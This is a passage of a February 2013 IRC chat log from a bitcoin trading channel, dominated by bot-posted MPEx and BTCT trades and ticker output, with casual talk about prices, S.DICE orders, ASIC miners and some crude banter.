make more sense... Feb 20 02:06:51 [MPEX] [S.MPOE] 10000 @ 0.00066663 = 6.6663 BTC [-] Feb 20 02:06:55 [MPEX] [S.MPOE] 1981 @ 0.00066664 = 1.3206 BTC [+] Feb 20 02:06:56 [MPEX] [S.MPOE] 16000 @ 0.00066665 = 10.6664 BTC [+] Feb 20 02:07:02 http://memorydealers.com/media/catalog/product/cache/1/image/9df78eab33525d08d6e5fb8d27136e95/1/0/10_casascius_bitcoin_silver_gold_logo.jpeg Feb 20 02:07:08 [MPEX] [S.MPOE] 7369 @ 0.00066666 = 4.9126 BTC [+] Feb 20 02:08:01 the value of each btc exceeds the silver value Feb 20 02:09:44 AT LAST Feb 20 02:10:23 Amazingrando decided to share contact details on skype... that guy is slow as a turtle. Feb 20 02:10:42 Homo Digitalis, here we are ! Feb 20 02:12:43 [MPEX] [S.MPOE] 9250 @ 0.00065748 = 6.0817 BTC [-] Feb 20 02:12:48 [MPEX] [S.MPOE] 10000 @ 0.00064831 = 6.4831 BTC [-] Feb 20 02:12:50 [MPEX] [S.MPOE] 7310 @ 0.0006483 = 4.7391 BTC [-] Feb 20 02:12:52 [MPEX] [S.MPOE] 337 @ 0.00064829 = 0.2185 BTC [-] Feb 20 02:16:12 ;;tslb Feb 20 02:16:14 Time since last block: 14 minutes and 12 seconds Feb 20 02:16:19 asic work goddamit Feb 20 02:17:15 [MPEX] [S.MPOE] 9300 @ 0.00066666 = 6.1999 BTC [+] Feb 20 02:19:14 [BTCTC] [B.YABMC] 1 @ 0.01317 BTC [-] Feb 20 02:19:16 [BTCTC] [B.YABMC] 9 @ 0.01316 = 0.1184 BTC [-] Feb 20 02:20:52 [MPEX] [S.MPOE] 5550 @ 0.00066666 = 3.7 BTC [+] Feb 20 02:21:47 lol asics are a mytj Feb 20 02:23:38 Hope, Certainty, and Reassurances.. Feb 20 02:23:59 spreading the HCR all over Feb 20 02:27:33 [MPEX] [S.DICE] 900 @ 0.00626285 = 5.6366 BTC [-] Feb 20 02:31:31 [MPEX] [S.MPOE] 10950 @ 0.00065825 = 7.2078 BTC [-] Feb 20 02:31:44 [MPEX] [S.MPOE] 6250 @ 0.00064829 = 4.0518 BTC [-] Feb 20 02:33:09 [MPEX] [S.DICE] 1000 @ 0.00614503 = 6.145 BTC [-] Feb 20 02:33:12 [MPEX] [S.DICE] 1000 @ 0.00614002 = 6.14 BTC [-] Feb 20 02:33:16 [MPEX] [S.DICE] 1000 @ 0.00614001 = 6.14 BTC [-] Feb 20 02:33:19 [MPEX] [S.DICE] 1000 @ 0.00613004 = 6.13 BTC [-] Feb 20 02:33:22 [MPEX] [S.DICE] 2000 @ 0.00612069 = 12.2414 BTC [-] Feb 20 02:33:24 [MPEX] [S.DICE] 3000 @ 0.00605001 = 18.15 BTC [-] Feb 20 02:33:30 whoa Feb 20 02:33:34 [MPEX] [S.DICE] 16000 @ 0.00605 = 96.8 BTC [-] Feb 20 02:33:35 market order. Feb 20 02:33:35 [MPEX] [S.DICE] 950 @ 0.00598092 = 5.6819 BTC [-] Feb 20 02:33:46 [MPEX] [S.DICE] 22159 @ 0.0057 = 126.3063 BTC [-] Feb 20 02:34:38 wtf just happened? Feb 20 02:35:09 its a buying opportunity Feb 20 02:35:09 ! Feb 20 02:35:38 missed it. Feb 20 02:36:04 they took it off the book Feb 20 02:36:15 and put it back at 0.0065. Feb 20 02:40:07 [BTCTC] [S.MPOE-PT] 10 @ 0.00067 = 0.0067 BTC [-] Feb 20 02:58:08 [MPEX] [S.MPOE] 7013 @ 0.00064829 = 4.5465 BTC [-] Feb 20 02:58:24 heh Feb 20 02:58:35 there's a rule that tghere must be one of these every month it seems Feb 20 02:59:01 [MPEX] [S.MPOE] 5942 @ 0.00063859 = 3.7945 BTC [-] Feb 20 02:59:03 [MPEX] [S.MPOE] 1000 @ 0.00063701 = 0.637 BTC [-] Feb 20 02:59:09 [MPEX] [S.MPOE] 4958 @ 0.0006313 = 3.13 BTC [-] Feb 20 02:59:13 i dont think that one even counts Feb 20 02:59:17 150 btc or so Feb 20 02:59:33 true Feb 20 02:59:37 i didn't add it up Feb 20 02:59:46 swhitt i don't see anything in the book at 65 ? Feb 20 03:03:14 [MPEX] [S.MPOE] 11100 @ 0.00063608 = 7.0605 BTC [+] Feb 20 03:05:16 [BTCTC] [LTC-MINING] 1 @ 0.31001 BTC [-] Feb 20 03:09:44 [MPEX] [S.MPOE] 7650 @ 0.0006313 = 4.8294 BTC [-] Feb 20 03:09:46 [MPEX] [S.MPOE] 2650 @ 0.00062936 = 1.6678 BTC [-] Feb 20 03:13:12 [BTCTC] [GSDPT] 6 @ 0.00611 = 0.0367 BTC [-] Feb 20 03:13:28 [BTCTC] [GSDPT] 932 @ 0.0061 = 5.6852 BTC [-] Feb 20 03:14:58 [BTCTC] [S.DICE-PT] 1200 @ 0.00603 = 7.236 BTC [-] Feb 20 03:28:13 Who's selling S.DICE for cheap? =/ Feb 20 03:28:45 the power of bids is amazing. Feb 20 03:29:02 also nature. Feb 20 03:31:49 eh Feb 20 03:31:56 [MPEX] [S.MPOE] 4929 @ 0.00063608 = 3.1352 BTC [+] Feb 20 03:31:58 mircea_popescu: it got pulled Feb 20 03:31:58 [MPEX] [S.MPOE] 10421 @ 0.0006399 = 6.6684 BTC [+] Feb 20 03:32:06 looked like someone was messing with a bot Feb 20 03:32:34 and accidentally put a market order in, then tried to sell at x btc above the higest bid Feb 20 03:36:47 shit, i didnt even know i had bids in. Feb 20 03:36:51 lulz Feb 20 03:36:53 [BTCTC] [S.MPOE-PT] 6 @ 0.00068 = 0.0041 BTC [+] Feb 20 03:37:50 got yourself some S.DICE, Kako? Feb 20 03:38:14 at 44 and 42 accually Feb 20 03:38:19 at least most of it Feb 20 03:38:35 a small bid was filled now Feb 20 03:38:49 What? You mean from weeks ago? Feb 20 03:38:53 ya Feb 20 03:39:01 and you realize that now =/ Feb 20 03:39:12 eheh Feb 20 03:39:18 Well I'm out for a bit Feb 20 03:39:52 no no, figured that out earlier Feb 20 03:40:31 i just forgot i had some bids in that were filled now Feb 20 03:40:59 yeah there was a 300 btc market order that gobbled up abunch of the bids Feb 20 03:41:21 accually most of that 44 prices shares have been sold Feb 20 03:41:30 got the top at 69 Feb 20 03:41:58 was a preety good deal on the end. Feb 20 03:42:07 [MPEX] [S.MPOE] 7489 @ 0.0006399 = 4.7922 BTC [+] Feb 20 03:44:10 [MPEX] [S.MPOE] 20127 @ 0.0006399 = 12.8793 BTC [+] Feb 20 03:51:47 [MPEX] [S.MPOE] 3900 @ 0.00064729 = 2.5244 BTC [+] Feb 20 03:51:50 [MPEX] [S.MPOE] 22000 @ 0.00064897 = 14.2773 BTC [+] Feb 20 04:00:38 [MPEX] [S.MPOE] 4501 @ 0.00064242 = 2.8915 BTC [-] Feb 20 04:00:39 [MPEX] [S.MPOE] 3303 @ 0.00064211 = 2.1209 BTC [-] Feb 20 04:14:10 howdy Feb 20 04:14:43 who runs coinabul? Feb 20 04:21:59 ;;slap deadweasel Feb 20 04:22:12 attaboy gribble, you still got it Feb 20 04:22:50 ;;slap gribble Feb 20 04:22:57 \o/ Feb 20 04:23:34 abra, should I sell my my btc to cover my costs of getting in? Feb 20 04:23:41 cos I'm techinically in the red til i do Feb 20 04:25:22 [MPEX] [S.MPOE] 5950 @ 0.0006452 = 3.8389 BTC [+] Feb 20 04:25:24 [MPEX] [S.MPOE] 4597 @ 0.00064211 = 2.9518 BTC [-] Feb 20 04:25:26 [MPEX] [S.MPOE] 1725 @ 0.00063466 = 1.0948 BTC [-] Feb 20 04:30:47 [MPEX] [S.MPOE] 14600 @ 0.00064897 = 9.475 BTC [+] Feb 20 04:31:44 ;;ticker Feb 20 04:31:44 BTCUSD ticker | Best bid: 29.30000, Best ask: 29.33000, Bid-ask spread: 0.03000, Last trade: 29.32000, 24 hour volume: 79269.41457172, 24 hour low: 27.15430, 24 hour high: 29.65000, 24 hour vwap: 28.52859 Feb 20 04:36:04 no house for dub Feb 20 04:36:05 Awesome... apparently unlimited data add-ons for 10$ will soon be available at my ISP. Feb 20 04:36:34 Right now I pay like 12$ for 60GB extra =/ Feb 20 04:36:41 sounds like shitty data Feb 20 04:37:06 [MPEX] [S.MPOE] 6636 @ 0.0006361 = 4.2212 BTC [-] Feb 20 04:38:15 You've been sounding grouchy the whole day dub. Feb 20 04:38:54 because I called you out for spamming? Feb 20 04:39:23 no, because all your comments sound angry =P Feb 20 04:40:33 odd, I usually go for the angry asshole feel but not sure whats different today Feb 20 04:41:15 I did just lose an auction Feb 20 04:44:54 [16:59] the pocket money mom gives him isnt goign to cover that Feb 20 04:44:54 [17:22] why should everyone else have to work to stop being annoyed by you Feb 20 04:44:54 [17:24] truffles: have you tried #bitcoin-otc? they encourage retardation Feb 20 04:44:54 [17:28] your face is funny Feb 20 04:44:54 [17:48] sadly you are not interesting to anyone Feb 20 04:44:54 [17:48] much like EskimoBob adding _afk to his nick, not a single fuck given Feb 20 04:44:55 [18:02] Namworld: got anything to make my penis bigger? Feb 20 04:44:55 [18:32] oww, my feels Feb 20 04:44:56 [21:35] no house for dub Feb 20 04:44:56 [21:36] sounds like shitty data Feb 20 04:45:10 [MPEX] [S.MPOE] 14148 @ 0.00063751 = 9.0195 BTC [+] Feb 20 04:45:26 Yeah, not really angry asshole, looks more like somewhat pissed and sad today. Tired. Feb 20 04:46:28 Like someone having a gloomy day and passing the stress with crude remarks. Feb 20 04:47:19 Namworld: lol Feb 20 04:47:36 [MPEX] [S.MPOE] 1552 @ 0.00063658 = 0.988 BTC [-] Feb 20 04:50:05 I prefer the angry asshole dub. Not the depressed emo asshole dub that has lightly aggressive remarks and sad remarks/brooding on his self inadequacies. Feb 20 04:50:43 did we get silver and btc crossing? Feb 20 04:51:34 [MPEX] [S.MPOE] 6750 @ 0.00064897 = 4.3805 BTC [+] Feb 20 04:51:50 High:$29.65000 Feb 20 04:51:55 for today on MtGox Feb 20 04:52:18 Isn't silver around 29.57 today? Feb 20 04:52:28 I guess we did. Feb 20 04:52:50 cool Feb 20 04:55:23 [MPEX] [S.MPOE] 9348 @ 0.00064485 = 6.0281 BTC [-] Feb 20 04:57:25 oh god the forum is so shit Feb 20 04:57:45 its not like i ahve not sent them $4000 personally to help fix it... fuck Feb 20 04:59:16 you should send me 4k as well Feb 20 04:59:21 at least i wont ban you here. Feb 20 05:05:41 the joke is he got banned on the forums Feb 20 05:06:02 after donating 50btc or smth Feb 20 05:12:56 [MPEX] [S.MPOE] 675 @ 0.00063466 = 0.4284 BTC [-] Feb 20 05:12:58 [MPEX] [S.MPOE] 10250 @ 0.00063228 = 6.4809 BTC [-] Feb 20 05:13:02 [MPEX] [S.MPOE] 6647 @ 0.00063187 = 4.2 BTC [-] Feb 20 05:15:52 kakobrekla i paid well over 100 btc in ads as well Feb 20 05:19:24 I once again beat market price. 12k S.DICE for 0.00645 BTC each on BTCT.co now. Feb 20 05:22:00 [MPEX] [S.DICE] 500 @ 0.0061 = 3.05 BTC [+] Feb 20 05:22:43 ;;calc 0.00140000 * .95 Feb 20 05:22:43 0.00133 Feb 20 05:22:49 oops Feb 20 05:23:02 ;;calc 0.00645 * .95 Feb 20 05:23:02 0.0061275 Feb 20 05:23:30 ;;bc,stats Feb 20 05:23:33 Current Blocks: 222101 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1674 blocks | Next Difficulty In About: 1 week, 3 days, 11 hours, 6 minutes, and 0 seconds | Next Difficulty Estimate: 4118081.63001 | Estimated Percent Change: 12.79289 Feb 20 05:24:19 Eh, what are you trying to calculate? Feb 20 05:24:33 whether your sdice is truly market Feb 20 05:25:51 Eh, they only beat MPEx ask and GSDPT ask Feb 20 05:26:37 If they get 5% less each month, they should cost 5% less than market price. So he should do current MPEx ask * 0.95 to see if it's a good ask Feb 20 05:27:01 It comes down to there's still a fee, but less than 5% Feb 20 05:27:43 ;;calc 5-(0.00645/0.00666665) Feb 20 05:27:43 4.03249758124 Feb 20 05:27:54 the action does seem to be at about .0061 or so this week Feb 20 05:28:06 4% under MPEx ask Feb 20 05:28:06 on the exchanges also Feb 20 05:28:27 hard to sell much at .0065+ Feb 20 05:28:52 Next Difficulty Estimate: 4118081.63001 Feb 20 05:28:56 daaaaaamn Feb 20 05:29:08 what do you think the diff afte rthat will reach? Feb 20 05:29:16 wait, I did that wrong... Feb 20 05:29:34 [MPEX] [S.MPOE] 4152 @ 0.00064101 = 2.6615 BTC [+] Feb 20 05:29:36 [MPEX] [S.MPOE] 10348 @ 0.00064156 = 6.6389 BTC [+] Feb 20 05:29:57 ;;calc 0.05-(1-(0.00645/0.00666665)) Feb 20 05:29:58 0.017502418756 Feb 20 05:30:10 1.7% fee for my ask vs MPEx ask Feb 20 05:31:18 You get more from my ask but 5% fee on dividends. In the end, 1.7% when comparing the two ask. Feb 20 05:31:50 99% payout on LTC Global ;) Feb 20 05:32:01 If you have a MPEx account, that's always cheaper tho. Feb 20 05:32:21 Them damn LTC-GLOBALers... Feb 20 05:33:31 ;;calc 0.00707025*0.0025 Feb 20 05:33:31 1.7675625e-05 Feb 20 05:33:37 erhm Feb 20 05:33:42 can everyone tone down the mining until i get my asic pl0x Feb 20 05:33:50 ;;calc 2.8281 * 0.0025 Feb 20 05:33:50 0.00707025 Feb 20 05:33:53 problem being that your share value on LTCG is currently guaranteed to go down Feb 20 05:34:01 But their shares cost 0.007 each Feb 20 05:34:11 so you have to plan to hold long term Feb 20 05:34:15 for divs Feb 20 05:34:26 big walls moved to 30.5 Feb 20 05:34:37 o? Feb 20 05:34:41 1-(0.007/0.00666665) Feb 20 05:34:47 ;;calc 1-(0.007/0.00666665) Feb 20 05:34:47 -0.0500026250066 Feb 20 05:34:54 aaaaand they moved. Feb 20 05:34:58 false Feb 20 05:34:59 see, -5% because of extra ask Feb 20 05:35:04 jesus, i can't watch this bitcoinity graph anymore Feb 20 05:35:11 Total 6% fee for LTC-GLOBAL Feb 20 05:35:16 Nam, if you catch the LTC/BTC rate and the Asks out of sync you can get SDICE at market or less sometimes Feb 20 05:35:32 [MPEX] [S.DICE] 500 @ 0.0061 = 3.05 BTC [+] Feb 20 05:35:50 Always a good thing to abuse fast market movements on Gox Feb 20 05:35:55 but still worth less off the lot... Feb 20 05:35:58 and trade on that on other markets Feb 20 05:36:10 before they catch up Feb 20 05:36:36 bfl shipped yet? Feb 20 05:36:42 Any small trader can do that without much difficulties. Tedious task however. Feb 20 05:37:58 [MPEX] [S.MPOE] 7308 @ 0.00063187 = 4.6177 BTC [-] Feb 20 05:37:59 [MPEX] [S.MPOE] 4000 @ 0.00062906 = 2.5162 BTC [-] Feb 20 05:38:00 [MPEX] [S.MPOE] 2780 @ 0.00062864 = 1.7476 BTC [-] Feb 20 05:39:49 No BFL shipped yet Feb 20 05:41:10 [MPEX] [S.DICE] 1000 @ 0.0061 = 6.1 BTC [+] Feb 20 05:41:35 holy crap, a king snake can devour another snake twice it's length. Feb 20 05:41:42 it folds it in half in it's stomach Feb 20 05:45:51 [MPEX] [S.MPOE] 3221 @ 0.00062864 = 2.0248 BTC [-] Feb 20 05:46:30 [MPEX] [S.MPOE] 206 @ 0.00062864 = 0.1295 BTC [-] Feb 20 05:54:20 [MPEX] [S.MPOE] 4435 @ 0.00062793 = 2.7849 BTC [-] Feb 20 05:59:30 [MPEX] [S.MPOE] 20859 @ 0.00062793 = 13.098 BTC [-] Feb 20 06:02:31 [MPEX] [S.MPOE] 6850 @ 0.00063023 = 4.3171 BTC [+] Feb 20 06:07:41 [MPEX] [S.MPOE] 3550 @ 0.00063023 = 2.2373 BTC [+] Feb 20 06:07:54 [MPEX] [S.MPOE] 7700 @ 0.00063942 = 4.9235 BTC [+] Feb 20 06:10:54 [MPEX] [S.MPOE] 8591 @ 0.00062814 = 5.3964 BTC [-] Feb 20 06:10:56 [MPEX] [S.MPOE] 6077 @ 0.0006264 = 3.8066 BTC [-] Feb 20 06:14:03 [MPEX] [S.MPOE] 1400 @ 0.00063942 = 0.8952 BTC [+] Feb 20 06:14:05 [MPEX] [S.MPOE] 2850 @ 0.00063942 = 1.8223 BTC [+] Feb 20 06:19:09 ;ticker Feb 20 06:19:14 ;;ticker Feb 20 06:19:14 BTCUSD ticker | Best bid: 29.29447, Best ask: 29.35999, Bid-ask spread: 0.06552, Last trade: 29.35999, 24 hour volume: 64615.35336494, 24 hour low: 27.15430, 24 hour high: 29.65000, 24 hour vwap: 28.71271 Feb 20 06:23:58 tank! Feb 20 06:24:11 bomb! Feb 20 06:31:50 [MPEX] [S.MPOE] 14523 @ 0.0006264 = 9.0972 BTC [-] Feb 20 06:31:53 [MPEX] [S.MPOE] 12877 @ 0.00062422 = 8.0381 BTC [-] Feb 20 06:39:45 ;;ticker Feb 20 06:39:45 BTCUSD ticker | Best bid: 29.39999, Best ask: 29.44000, Bid-ask spread: 0.04001, Last trade: 29.35900, 24 hour volume: 62850.69195665, 24 hour low: 27.40000, 24 hour high: 29.65000, 24 hour vwap: 28.75154 Feb 20 06:39:53 30! 30! Feb 20 06:48:34 [MPEX] [S.MPOE] 11150 @ 0.00063942 = 7.1295 BTC [+] Feb 20 06:48:42 [MPEX] [S.MPOE] 7852 @ 0.00064156 = 5.0375 BTC [+] Feb 20 06:48:44 [MPEX] [S.MPOE] 6727 @ 0.00064169 = 4.3166 BTC [+] Feb 20 06:49:11 ;;ticker Feb 20 06:49:11 BTCUSD ticker | Best bid: 29.39999, Best ask: 29.40393, Bid-ask spread: 0.00394, Last trade: 29.40393, 24 hour volume: 62910.62323197, 24 hour low: 27.50000, 24 hour high: 29.65000, 24 hour vwap: 28.75827 Feb 20 06:50:41 Looks like we got ourselves a satoshi wale Feb 20 06:50:43 whale Feb 20 06:50:50 oh? Feb 20 06:50:53 everyone man the harpoons! Feb 20 06:51:05 http://satoshidice.com/ Feb 20 06:51:10 take a look at the recent loses Feb 20 06:53:43 whales are good. **** BEGIN LOGGING AT Wed Feb 20 13:12:53 2013 Feb 20 13:12:58 goood morning! Feb 20 13:13:06 hi Feb 20 13:13:17 whats new ? Feb 20 13:14:24 [BTCTC] [S.MPOE-PT] 4 @ 0.00065 = 0.0026 BTC [-] Feb 20 13:15:01 good morning to you Feb 20 13:15:33 [MPEX] [S.DICE] 1000000 @ 0.00639 = 6390 BTC [-] Feb 20 13:15:42 o hi there mr rainmaker. Feb 20 13:15:50 !ticker s.dice Feb 20 13:15:51 Have you got any tobacco? Feb 20 13:15:56 !ticker m s.dice Feb 20 13:15:58 [MPEX:S.DICE] 1D: 0.0057 / 0.00638746 / 0.00675813 (1133957 shares, 7,243.11 BTC), 7D: 0.0057 / 0.00638202 / 0.0069 (1351237 shares, 8,623.63 BTC), 30D: 0.00085848 / 0.0059235 / 0.0075 (7743188 shares, 45,866.85 BTC) Feb 20 13:17:54 that gwern.net article about silk road reads very much like a popescu piece Feb 20 13:18:54 Have you got any tobacco? oh lol Feb 20 13:19:20 lyspooner you think everything reads like me. mpoe-pr, gwern.net... Feb 20 13:19:31 i just hope and pray you won't be saying obama sounds like me. Feb 20 13:31:27 [MPEX] [S.MPOE] 4321 @ 0.00063653 = 2.7504 BTC [+] Feb 20 13:31:29 [MPEX] [S.MPOE] 5921 @ 0.0006364 = 3.7681 BTC [-] Feb 20 13:31:31 [MPEX] [S.MPOE] 15758 @ 0.00063639 = 10.0282 BTC [-] Feb 20 13:39:50 someone bought 1 million shares of S.DICE? nice Feb 20 13:40:38 !tobacco have you.got Feb 20 13:40:54 pff assbot is not sufficiently ai. Feb 20 13:42:48 [MPEX] [S.MPOE] 4337 @ 0.00063639 = 2.76 BTC [-] Feb 20 13:42:50 [MPEX] [S.MPOE] 4321 @ 0.00063553 = 2.7461 BTC [-] Feb 20 13:42:51 [MPEX] [S.MPOE] 7227 @ 0.00063552 = 4.5929 BTC [-] Feb 20 13:50:27 [MPEX] [S.MPOE] 4321 @ 0.00064019 = 2.7663 BTC [+] Feb 20 13:50:29 [MPEX] [S.MPOE] 9679 @ 0.00064033 = 6.1978 BTC [+] Feb 20 13:54:47 [MPEX] [S.MPOE] 4321 @ 0.00064032 = 2.7668 BTC [-] Feb 20 13:54:48 [MPEX] [S.MPOE] 5379 @ 0.00064033 = 3.4443 BTC [+] Feb 20 14:00:32 [MPEX] [S.MPOE] 8800 @ 0.00063592 = 5.5961 BTC [-] Feb 20 14:04:29 [MPEX] [S.MPOE] 4321 @ 0.00064012 = 2.766 BTC [+] Feb 20 14:04:31 [MPEX] [S.MPOE] 942 @ 0.00064033 = 0.6032 BTC [+] Feb 20 14:04:33 [MPEX] [S.MPOE] 15637 @ 0.00064034 = 10.013 BTC [+] Feb 20 14:08:19 [MPEX] [S.MPOE] 3000 @ 0.00064034 = 1.921 BTC [+] Feb 20 14:11:48 [MPEX] [S.MPOE] 663 @ 0.00064034 = 0.4245 BTC [+] Feb 20 14:12:30 [MPEX] [S.MPOE] 27187 @ 0.00064579 = 17.5571 BTC [+] Feb 20 14:14:00 here's some news Feb 20 14:14:01 https://mtgox.com/press_release_20130220.html Feb 20 14:16:06 this rally isn't even full throttle yet Feb 20 14:18:43 [MPEX] [S.MPOE] 7955 @ 0.00064454 = 5.1273 BTC [-] Feb 20 14:32:20 [MPEX] [S.MPOE] 15903 @ 0.00064454 = 10.2501 BTC [-] Feb 20 14:32:22 [MPEX] [S.MPOE] 7262 @ 0.00065048 = 4.7238 BTC [+] Feb 20 14:35:00 [MPEX] [S.MPOE] 16250 @ 0.00065048 = 10.5703 BTC [+] Feb 20 14:52:16 [MPEX] [S.MPOE] 4017 @ 0.00065048 = 2.613 BTC [+] Feb 20 14:53:58 [MPEX] [S.MPOE] 2533 @ 0.00065128 = 1.6497 BTC [+] Feb 20 14:54:01 [MPEX] [S.MPOE] 19367 @ 0.00064953 = 12.5794 BTC [-] Feb 20 14:54:46 [MPEX] [S.MPOE] 2303 @ 0.00064953 = 1.4959 BTC [-] Feb 20 14:57:46 [MPEX] [S.MPOE] 6150 @ 0.00064173 = 3.9466 BTC [-] Feb 20 14:59:56 anyone use this? https://bitmessage.org/wiki/Main_Page Feb 20 15:03:20 [MPEX] [S.MPOE] 4321 @ 0.00063957 = 2.7636 BTC [-] Feb 20 15:03:22 [MPEX] [S.MPOE] 5724 @ 0.00063956 = 3.6608 BTC [-] Feb 20 15:05:15 Chaang-Noi: yeah doublec is using it for support communication for his exchanges Feb 20 15:06:09 oh and his pool too i see by his last message Feb 20 15:06:51 ;;ticker Feb 20 15:06:51 BTCUSD ticker | Best bid: 29.06000, Best ask: 29.32865, Bid-ask spread: 0.26865, Last trade: 29.32865, 24 hour volume: 57042.40054926, 24 hour low: 28.10100, 24 hour high: 29.65000, 24 hour vwap: 29.10914 Feb 20 15:08:30 pigeons is it pretty cool? Feb 20 15:08:36 easy to use? Feb 20 15:10:11 yes its easy to use just run the python script and you're good Feb 20 15:12:44 cool Feb 20 15:14:44 [MPEX] [S.MPOE] 4321 @ 0.00063973 = 2.7643 BTC [+] Feb 20 15:14:46 [MPEX] [S.MPOE] 6679 @ 0.00063956 = 4.2716 BTC [-] Feb 20 15:21:03 [MPEX] [S.MPOE] 5797 @ 0.00063956 = 3.7075 BTC [-] Feb 20 15:21:08 [MPEX] [S.MPOE] 4321 @ 0.00063637 = 2.7498 BTC [-] Feb 20 15:21:10 [MPEX] [S.MPOE] 7373 @ 0.00063636 = 4.6919 BTC [-] Feb 20 15:22:21 They unwrapped the machine! Feb 20 15:22:21 http://198.245.60.111/Pix/InhouseProduction1.jpg Feb 20 15:23:11 ;;asks 30 Feb 20 15:23:12 There are currently 13585.687 bitcoins offered at or under 30.0 USD, worth 406185.795316 USD in total. Feb 20 15:24:02 [MPEX] [S.MPOE] 4321 @ 0.00063933 = 2.7625 BTC [+] Feb 20 15:24:04 [MPEX] [S.MPOE] 4579 @ 0.00063966 = 2.929 BTC [+] Feb 20 15:27:49 so full tour here http://198.245.60.111/Pix/ Feb 20 15:34:06 [MPEX] [S.MPOE] 11000 @ 0.00063966 = 7.0363 BTC [+] Feb 20 15:57:13 [MPEX] [S.MPOE] 8321 @ 0.00063966 = 5.3226 BTC [+] Feb 20 15:57:13 anyone know the website run by death for taxes that buys btc? Feb 20 15:57:21 [MPEX] [S.MPOE] 12097 @ 0.00064173 = 7.763 BTC [+] Feb 20 15:57:22 [MPEX] [S.MPOE] 20100 @ 0.0006515 = 13.0952 BTC [+] Feb 20 15:57:23 [MPEX] [S.MPOE] 10509 @ 0.00065192 = 6.851 BTC [+] Feb 20 15:57:25 [MPEX] [S.MPOE] 7300 @ 0.00065491 = 4.7808 BTC [+] Feb 20 15:57:25 [MPEX] [S.MPOE] 15618 @ 0.00065569 = 10.2406 BTC [+] Feb 20 15:57:27 [MPEX] [S.MPOE] 9855 @ 0.00065625 = 6.4673 BTC [+] Feb 20 16:05:33 tangible cryptography someting Feb 20 16:05:50 [MPEX] [S.MPOE] 4321 @ 0.0006365 = 2.7503 BTC [-] Feb 20 16:05:51 [MPEX] [S.MPOE] 10000 @ 0.00063637 = 6.3637 BTC [-] Feb 20 16:05:53 [MPEX] [S.MPOE] 3729 @ 0.00063636 = 2.373 BTC [-] Feb 20 16:08:29 ;;bc,stats Feb 20 16:08:31 Current Blocks: 222183 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1592 blocks | Next Difficulty In About: 1 week, 2 days, 1 hour, 5 minutes, and 27 seconds | Next Difficulty Estimate: 4206644.38886 | Estimated Percent Change: 15.2186 Feb 20 16:14:53 don't use fastcash... Feb 20 16:16:14 mircea_popescu: i summon theee Feb 20 16:16:38 [MPEX] [S.MPOE] 111 @ 0.00063636 = 0.0706 BTC [-] Feb 20 16:16:40 [MPEX] [S.MPOE] 4321 @ 0.00063579 = 2.7472 BTC [-] Feb 20 16:16:47 [MPEX] [S.MPOE] 908 @ 0.00063578 = 0.5773 BTC [-] Feb 20 16:17:34 i think to do that you look in a mirror and say biggiesmalls 3 times Feb 20 16:18:00 you watch too much south park Feb 20 16:18:22 not enough Feb 20 16:18:25 mirror doesn't work. ne has to pray to picture of mpoe-pr Feb 20 16:18:42 that's a good joke about biggie smalls Feb 20 16:18:49 he's trying to go to satan's birthday Feb 20 16:18:59 but the kids keep summoning him on halloween or something... Feb 20 16:19:07 yeah :) Feb 20 16:19:18 and he's like "fucking shit. I'm trying to go to a fucking party!" Feb 20 16:19:18 same thing happens to mircea_popescu Feb 20 16:19:49 that would be a good premise for a webcomic Feb 20 16:20:01 [MPEX] [S.MPOE] 7850 @ 0.00063578 = 4.9909 BTC [-] Feb 20 16:20:25 mircea_popescu is fucking some broad, then some bloke summons him, and he's like "fucking shit dude, srsly?" Feb 20 16:21:00 "can you process my 1btc withdrawal" Feb 20 16:22:34 yup! and I will name the article: Summoning Biggie Smalls or the case for why MPEX needs automated processing Feb 20 16:29:16 what is wrong with fastcash4bitcoins? Feb 20 16:30:34 [06:15:18] <@assbot> [MPEX] [S.DICE] 1000000 @ 0.00639 = 6390 BTC [-] Feb 20 16:30:38 wow that kinda came out of the blue? Feb 20 16:33:02 btw, if you didn't placed it yes, i can facilitate fast withdrawals. Feb 20 16:33:12 for 0.1BTC fee Feb 20 16:33:29 *if you didn't placed it yet Feb 20 16:34:37 yeah that's a nice block Feb 20 16:42:49 dafuck is BFL putting this Feb 20 16:42:50 http://www.amazon.com/FSP-CrossFire-Upgrade-BOOSTER-X5/dp/B002IZE5RE Feb 20 16:42:54 in thir units Feb 20 16:49:59 [MPEX] [S.MPOE] 3992 @ 0.00063578 = 2.538 BTC [-] Feb 20 16:50:03 [MPEX] [S.MPOE] 8773 @ 0.00063552 = 5.5754 BTC [-] Feb 20 16:50:05 [MPEX] [S.MPOE] 7285 @ 0.0006355 = 4.6296 BTC [-] Feb 20 16:50:42 so what happens if mircea_popescu dies, like has a heart attack Feb 20 16:50:47 will mpoe-pr get us our money? Feb 20 16:52:03 he says he's not gonna die for a few years Feb 20 16:52:15 some people believe him Feb 20 16:53:27 well he says his "CTO" i think, who does happen to be female, has the private keys or something and instructions to bury his ashes at archie bunker's place Feb 20 16:54:25 Time for another rally. Feb 20 16:54:29 lets do it Feb 20 16:55:15 you're nuts Feb 20 16:56:28 let's just get it over with Feb 20 16:56:35 break thru 32 Feb 20 16:57:33 [MPEX] [S.MPOE] 4321 @ 0.00064279 = 2.7775 BTC [+] Feb 20 16:57:35 [MPEX] [S.MPOE] 15645 @ 0.00064306 = 10.0607 BTC [+] Feb 20 17:00:55 ;;ticker Feb 20 17:00:56 BTCUSD ticker | Best bid: 29.53001, Best ask: 29.53899, Bid-ask spread: 0.00898, Last trade: 29.53899, 24 hour volume: 53319.85925499, 24 hour low: 28.50600, 24 hour high: 29.65000, 24 hour vwap: 29.20804 Feb 20 17:01:01 break through 30 first :) Feb 20 17:01:04 ;;asks 30 Feb 20 17:01:06 There are currently 13925.478 bitcoins offered at or under 30.0 USD, worth 416323.795796 USD in total. Feb 20 17:05:51 This ride doesnt like ending anytime soon does it? Feb 20 17:11:23 [MPEX] [S.MPOE] 5 @ 0.00064306 = 0.0032 BTC [+] Feb 20 17:11:24 [MPEX] [S.MPOE] 4321 @ 0.00065062 = 2.8113 BTC [+] Feb 20 17:11:25 [MPEX] [S.MPOE] 18574 @ 0.00065063 = 12.0848 BTC [+] Feb 20 17:14:22 [BTCTC] [B.YABMC] 2 @ 0.00733 = 0.0147 BTC [+] Feb 20 17:14:25 [BTCTC] [B.YABMC] 98 @ 0.00732 = 0.7174 BTC [-] Feb 20 17:17:37 [MPEX] [S.MPOE] 4321 @ 0.00064151 = 2.772 BTC [-] Feb 20 17:17:38 [MPEX] [S.MPOE] 14459 @ 0.00064122 = 9.2714 